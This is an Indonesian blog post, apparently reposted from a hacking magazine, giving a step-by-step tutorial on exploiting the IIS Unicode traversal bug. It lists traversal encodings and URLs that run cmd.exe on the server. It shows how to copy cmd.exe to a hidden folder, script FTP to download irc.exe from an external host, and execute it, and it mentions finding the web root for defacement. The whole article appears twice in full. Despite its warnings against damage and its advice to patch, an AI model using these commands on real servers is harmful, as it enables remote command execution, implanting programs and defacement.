Unicode
Artikel ini saya dapatkan dari : Kaset XCODE !!
Mudah-mudahan bisa menambah pengetahuan baru...
Awal dan dasar-dasar mengenai hubungan tcp/ip, cara daemon server bekerja , serta cara memanfaatkan kelemahan daemon server dengan exploit telah dibahas pada NeoTek Vol. II, No. 2 November 2001. Maka kali ini pembahasan akan difokuskan pada pemanfaatan bug yang ada pada iis (Internet Information Service) yakni sebuah service yang terinstal pada Microsoft Windows nt System. Layanan iis ini terdiri atas ftp Service dan Web Service yang listening pada port 21 dan 80.
Persiapan Awal
Karena sangat diharamkan untuk belajar hacking pada sistem orang lain (supaya tidak dikatakan perusak) maka saya sarankan untuk mencoba menginstal sendiri nt System pada pc anda dan jangan lupa aktifkan juga IIS. Untuk Nt4 terinstall dengan iis-4 sedangkan Windows2000 terinstall iis-5.
Setelah pada pc anda terinstall iis, maka anda bisa langsung mulai hacking nt. Coba uji kembali dengan browsing http://localhost/ dari browser anda. Apabila sudah ada tampilan halaman default dari iis, maka iis anda sudah berjalan dengan mulus.
Deteksi Hole Pada IIS
IIS memiliki sejumlah bug yang terkenal dengan sebutan Unicode Bug. Inilah daftar dari sejumlah Unicode Bug tersebut:
..%255c..%255c
..%252e..%252e
..%%35c..%%35c
..%c0%af..
..%c1%af..
..%c1%9c..
..%c1%pc..
..%c1%1c..
..%c0%9v..
..%c1%8s..
..%e0%80%af..
..%f0%80%80%af..
..%f8%80%80%80%af..
..%fc%80%80%80%80%af..
..%25%35%63..%25%35%63
..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../
Lalu bagaimanakah cara memanfaatkannya? IIS memiliki folder khusus untuk menjalankan script-script yakni:
/scripts
/cgi-bin
/msadc
/_vti_bin
/_vti_cnf
/iisadmpwd
Format untuk mengetahui apakah server anda memiliki unicode bug atau tidak, bisa dicoba dengan langsung mentesnya pada web browser.
http://localhost/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Misalnya ada tampilan yang menunjukkan file-file, maka dipastikan server anda memiliki unicode bug yang bisa dimanfaatkan. Lalu coba lagi untuk folder cgi-bin, msadc, vtibin, dll. Jangan lupa juga ganti dengan unicode lainnya apabila tidak berhasil.
Aplikasi Unicode Bug
Unicode bug ini merupakan kelemahan pada IIS yang memungkinkan seseorang untuk menjalankan command- command pada shell windows langsung. Jadi command-command seperti dir, mkdir, copy, ping, bahkan sampai pada format, del, deltree yang sifatnya merusak pun bisa dijalankan.
Cuma sekali lagi saya sarankan janganlah berbuat merusak kalau ini anda praktikkan terhadap server yang bukan milik anda (remote server). Kita sesama pengguna Internet diharapkan menjadi teman, dan bukan musuh satu sama lain yang saling menghancurkan.
Lantas bagaimana cara mengetahui folder index daripada webserver IIS ? coba ketikkan http://localhost/t3rm.ida dan pada browser akan menampilkan lokasi folder index web berada. Biasanya hal ini digunakan untuk mencari file index.htm dan akhir-akhirnya digunakan untuk deface halaman index dari suatu web. Percayalah deface bukan hal yang baik untuk dilakukan, kalau anda mau pamer untuk menampikan identitas anda, pasang saja webserver yang berjalan di port lain lalu disitu buat sesuka anda file index.htm nya, dibandingkan harus deface file html yang bukan milik kita dan apalagi menghapus file-file penting di website tersebut.
Lalu bagaimana caranya meng-upload webserver atau daemon-daemon yang berguna lainnnya ke sana ?
Gambaran langkah-langkahnya seperti ini: setiap nt Server memiliki file ftp.exe yang berguna untuk melakukan ftp upload dan download file ke host tujuan. Nah nt Server yang memiliki Unicode Bug itu kita suruh melakukan download ke host milik kita yang sudah ditaruh macam-macam daemon siap pakai. Cobalah taruh di free host yang ada di Internet seperti Geocities, Freeservers dll.
Langkah-langkah menempatkan program kita ke server nt tujuan hacking.
Carilah folder tersembunyi yang bisa dijadikan sebagai markas bersarangnya program-program kita. Misal:
C:\Program Files\ atau
C:\Inetpub dsb.
Lalu uji apakah folder tersebut memiliki akses ‘Read and Write,’ dalam arti apakah folder itu diberi akses untuk del, mkdir, modifikasi file, dsb. Misal akan di-copy-kan ke folder Program Files, lakukan command ini di browser:
http://localhost/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\progra~1\t3rm.exe.
Apabila folder Program Files diberi akses ‘Read and Write’ maka akan ada tampilan error dan ada tulisan ‘1 file coppied.’ Selamat! Berarti anda telah berhasil menyelesaikan langkah pertama yakni menentukan lokasi markas besar anda.
Untuk selanjutnya perintah unicode sudah dapat anda singkat menjadi
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+
Karena anda akan menggunakan ftp yang dioperasikan secara otomatis melalui script ftp, maka buatlah script ftp. Perintah yang digunakan adalah ECHO. Bentuk umum penggunaan ECHO adalah echo perintah-ftp >> nama-file-script-ftp.txt
Oke, berikut dicontohkan isi file t3rm.ftp yang akan saya gunakan untuk download file irc.exe yang saya miliki di freeserver geocities.com
OPEN GEOCITIES.COM
T3RM
PASSWORDSAYA
LCD C:\PROGRA~1\
BINARY
GET IRC.EXE
CLOSE
Penjelasan dari perintah-perintah tersebut:
· OPEN merupakan perintah untuk melakukah hubungan ftp ke server tujuan, dimana server tujuan saya adalah geocities.com.
· T3RM merupakan username saya
· PASSWORDSAYA merupakan password yang harus saya isikan.
Lalu setelah berhasil login ke sana, saya menentukan lokasi tempat download saya di server nt yang saya hack di mana pada skrip di atas adalah C:\PROGRAM FILES\ , setelah itu karena jenis file yang akan saya download adalah exe maka saya tentukan jenis transfernya binary. Untuk file-file seperti tar.gz, zip, gunakan juga binary. Hanya untuk file-file seperti html, txt, doc, baru gunakan ascii untuk transfernya.
Lantas bagaimana perintah membuat skrip tsb? Masukkan satu persatu seperti berikut dan tunggu sampai muncul tampilan ‘error CGI Filename****.’ Hal tersebut berarti menandakan anda berhasil:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+OPEN+GEOCITIES.COM+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+T3RM+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+PASSWORDSAYA+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+LCD+C:\PROGRA~1\+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+BINARY+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+GET+IRC.EXE+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+CLOSE+>>+C:\PROGRA~1\t3rm.ftp
Oke, skrip yang anda buat sudah selesai dan silakan lihat kembali keseluruhan isi dari skrip dengan perintah:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+type+c:\progra~1\t3rm.ftp
Apakah semuanya sudah sesuai dengan urutan? Kalau sudah oke dan sesuai dengan urutannya, maka jalankan FTP dengan menggunakan skrip tersebut dengan perintah:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+ftp+-s:c:\progra~1\t3rm.ftp
Tunggu prosesnya beberapa saat dan jangan tutup browser.
Buka browser satu lagi dan masukkan perintah
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+dir+c:\progra~1\
Refresh berulang kali sampai file irc.exe sudah nampak dan sizenya sesuai dengan size yang ada pada server geocities.
Kalau sudah selesai berarti langkah selanjutnya adalah jalankan file irc.exe tersebut.
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+c:\progra~1\irc.exe
Kalau saja file irc.exe merupakan sebuah program proxy irc dan listening di port anggaplah 8080, maka karena sudah dijalankan di PC anda, rekan anda pun bisa memanfaatkannya asal dia tahu port dan IP address anda di Internet. Jadi sungguhlah berbahaya apabila anda memiliki server nt yang memiliki bug unicode, terlebih lagi serangan code red pun menggunakan teknik yang sama seperti ini. Bandwidth kita akan habis, dan kita pun bisa dijadikan sebuah benteng pertahanan bagi orang-orang yang tidak bertanggung jawab. Untuk para pemilik server nt yang memiliki unicode bug ini, saya sarankan untuk sesegera mungkin patch server anda, atau uninstall IIS dan ganti dengan daemon yang lain.
Demikianlah artikel saya kali ini mengenai langkah-langkah dasar memanfaatkan unicode bug pada server nt. Anda bisa mengembangkannya ke banyak hal seperti membuat Proxy Server, Irc Server, WebServer, Streaming Audio Server, dsb pada server nt yang memiliki lubang keamanan tsb. Cuma saran saya jadikanlah sebagai eksperimen saja, dan jangan merusak. Kalau perlu beritahu pemilik server agar sesegera mungkin patch servernya.
Bila ada editan yang salah saya mohon maaf sebesar-besarnya dan mungkin temanku sekalian bisa menambahkannya...
Mudah-mudahan bisa menambah pengetahuan baru...
Awal dan dasar-dasar mengenai hubungan tcp/ip, cara daemon server bekerja , serta cara memanfaatkan kelemahan daemon server dengan exploit telah dibahas pada NeoTek Vol. II, No. 2 November 2001. Maka kali ini pembahasan akan difokuskan pada pemanfaatan bug yang ada pada iis (Internet Information Service) yakni sebuah service yang terinstal pada Microsoft Windows nt System. Layanan iis ini terdiri atas ftp Service dan Web Service yang listening pada port 21 dan 80.
Persiapan Awal
Karena sangat diharamkan untuk belajar hacking pada sistem orang lain (supaya tidak dikatakan perusak) maka saya sarankan untuk mencoba menginstal sendiri nt System pada pc anda dan jangan lupa aktifkan juga IIS. Untuk Nt4 terinstall dengan iis-4 sedangkan Windows2000 terinstall iis-5.
Setelah pada pc anda terinstall iis, maka anda bisa langsung mulai hacking nt. Coba uji kembali dengan browsing http://localhost/ dari browser anda. Apabila sudah ada tampilan halaman default dari iis, maka iis anda sudah berjalan dengan mulus.
Deteksi Hole Pada IIS
IIS memiliki sejumlah bug yang terkenal dengan sebutan Unicode Bug. Inilah daftar dari sejumlah Unicode Bug tersebut:
..%255c..%255c
..%252e..%252e
..%%35c..%%35c
..%c0%af..
..%c1%af..
..%c1%9c..
..%c1%pc..
..%c1%1c..
..%c0%9v..
..%c1%8s..
..%e0%80%af..
..%f0%80%80%af..
..%f8%80%80%80%af..
..%fc%80%80%80%80%af..
..%25%35%63..%25%35%63
..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../
Lalu bagaimanakah cara memanfaatkannya? IIS memiliki folder khusus untuk menjalankan script-script yakni:
/scripts
/cgi-bin
/msadc
/_vti_bin
/_vti_cnf
/iisadmpwd
Format untuk mengetahui apakah server anda memiliki unicode bug atau tidak, bisa dicoba dengan langsung mentesnya pada web browser.
http://localhost/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Misalnya ada tampilan yang menunjukkan file-file, maka dipastikan server anda memiliki unicode bug yang bisa dimanfaatkan. Lalu coba lagi untuk folder cgi-bin, msadc, vtibin, dll. Jangan lupa juga ganti dengan unicode lainnya apabila tidak berhasil.
Aplikasi Unicode Bug
Unicode bug ini merupakan kelemahan pada IIS yang memungkinkan seseorang untuk menjalankan command- command pada shell windows langsung. Jadi command-command seperti dir, mkdir, copy, ping, bahkan sampai pada format, del, deltree yang sifatnya merusak pun bisa dijalankan.
Cuma sekali lagi saya sarankan janganlah berbuat merusak kalau ini anda praktikkan terhadap server yang bukan milik anda (remote server). Kita sesama pengguna Internet diharapkan menjadi teman, dan bukan musuh satu sama lain yang saling menghancurkan.
Lantas bagaimana cara mengetahui folder index daripada webserver IIS ? coba ketikkan http://localhost/t3rm.ida dan pada browser akan menampilkan lokasi folder index web berada. Biasanya hal ini digunakan untuk mencari file index.htm dan akhir-akhirnya digunakan untuk deface halaman index dari suatu web. Percayalah deface bukan hal yang baik untuk dilakukan, kalau anda mau pamer untuk menampikan identitas anda, pasang saja webserver yang berjalan di port lain lalu disitu buat sesuka anda file index.htm nya, dibandingkan harus deface file html yang bukan milik kita dan apalagi menghapus file-file penting di website tersebut.
Lalu bagaimana caranya meng-upload webserver atau daemon-daemon yang berguna lainnnya ke sana ?
Gambaran langkah-langkahnya seperti ini: setiap nt Server memiliki file ftp.exe yang berguna untuk melakukan ftp upload dan download file ke host tujuan. Nah nt Server yang memiliki Unicode Bug itu kita suruh melakukan download ke host milik kita yang sudah ditaruh macam-macam daemon siap pakai. Cobalah taruh di free host yang ada di Internet seperti Geocities, Freeservers dll.
Langkah-langkah menempatkan program kita ke server nt tujuan hacking.
Carilah folder tersembunyi yang bisa dijadikan sebagai markas bersarangnya program-program kita. Misal:
C:\Program Files\ atau
C:\Inetpub dsb.
Lalu uji apakah folder tersebut memiliki akses ‘Read and Write,’ dalam arti apakah folder itu diberi akses untuk del, mkdir, modifikasi file, dsb. Misal akan di-copy-kan ke folder Program Files, lakukan command ini di browser:
http://localhost/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\progra~1\t3rm.exe.
Apabila folder Program Files diberi akses ‘Read and Write’ maka akan ada tampilan error dan ada tulisan ‘1 file coppied.’ Selamat! Berarti anda telah berhasil menyelesaikan langkah pertama yakni menentukan lokasi markas besar anda.
Untuk selanjutnya perintah unicode sudah dapat anda singkat menjadi
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+
Karena anda akan menggunakan ftp yang dioperasikan secara otomatis melalui script ftp, maka buatlah script ftp. Perintah yang digunakan adalah ECHO. Bentuk umum penggunaan ECHO adalah echo perintah-ftp >> nama-file-script-ftp.txt
Oke, berikut dicontohkan isi file t3rm.ftp yang akan saya gunakan untuk download file irc.exe yang saya miliki di freeserver geocities.com
OPEN GEOCITIES.COM
T3RM
PASSWORDSAYA
LCD C:\PROGRA~1\
BINARY
GET IRC.EXE
CLOSE
Penjelasan dari perintah-perintah tersebut:
· OPEN merupakan perintah untuk melakukah hubungan ftp ke server tujuan, dimana server tujuan saya adalah geocities.com.
· T3RM merupakan username saya
· PASSWORDSAYA merupakan password yang harus saya isikan.
Lalu setelah berhasil login ke sana, saya menentukan lokasi tempat download saya di server nt yang saya hack di mana pada skrip di atas adalah C:\PROGRAM FILES\ , setelah itu karena jenis file yang akan saya download adalah exe maka saya tentukan jenis transfernya binary. Untuk file-file seperti tar.gz, zip, gunakan juga binary. Hanya untuk file-file seperti html, txt, doc, baru gunakan ascii untuk transfernya.
Lantas bagaimana perintah membuat skrip tsb? Masukkan satu persatu seperti berikut dan tunggu sampai muncul tampilan ‘error CGI Filename****.’ Hal tersebut berarti menandakan anda berhasil:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+OPEN+GEOCITIES.COM+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+T3RM+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+PASSWORDSAYA+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+LCD+C:\PROGRA~1\+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+BINARY+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+GET+IRC.EXE+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+CLOSE+>>+C:\PROGRA~1\t3rm.ftp
Oke, skrip yang anda buat sudah selesai dan silakan lihat kembali keseluruhan isi dari skrip dengan perintah:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+type+c:\progra~1\t3rm.ftp
Apakah semuanya sudah sesuai dengan urutan? Kalau sudah oke dan sesuai dengan urutannya, maka jalankan FTP dengan menggunakan skrip tersebut dengan perintah:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+ftp+-s:c:\progra~1\t3rm.ftp
Tunggu prosesnya beberapa saat dan jangan tutup browser.
Buka browser satu lagi dan masukkan perintah
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+dir+c:\progra~1\
Refresh berulang kali sampai file irc.exe sudah nampak dan sizenya sesuai dengan size yang ada pada server geocities.
Kalau sudah selesai berarti langkah selanjutnya adalah jalankan file irc.exe tersebut.
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+c:\progra~1\irc.exe
Kalau saja file irc.exe merupakan sebuah program proxy irc dan listening di port anggaplah 8080, maka karena sudah dijalankan di PC anda, rekan anda pun bisa memanfaatkannya asal dia tahu port dan IP address anda di Internet. Jadi sungguhlah berbahaya apabila anda memiliki server nt yang memiliki bug unicode, terlebih lagi serangan code red pun menggunakan teknik yang sama seperti ini. Bandwidth kita akan habis, dan kita pun bisa dijadikan sebuah benteng pertahanan bagi orang-orang yang tidak bertanggung jawab. Untuk para pemilik server nt yang memiliki unicode bug ini, saya sarankan untuk sesegera mungkin patch server anda, atau uninstall IIS dan ganti dengan daemon yang lain.
Demikianlah artikel saya kali ini mengenai langkah-langkah dasar memanfaatkan unicode bug pada server nt. Anda bisa mengembangkannya ke banyak hal seperti membuat Proxy Server, Irc Server, WebServer, Streaming Audio Server, dsb pada server nt yang memiliki lubang keamanan tsb. Cuma saran saya jadikanlah sebagai eksperimen saja, dan jangan merusak. Kalau perlu beritahu pemilik server agar sesegera mungkin patch servernya.
Bila ada editan yang salah saya mohon maaf sebesar-besarnya dan mungkin temanku sekalian bisa menambahkannya...
Komentar
Posting Komentar
NO SPAM HERE !!!! OK GUYS !!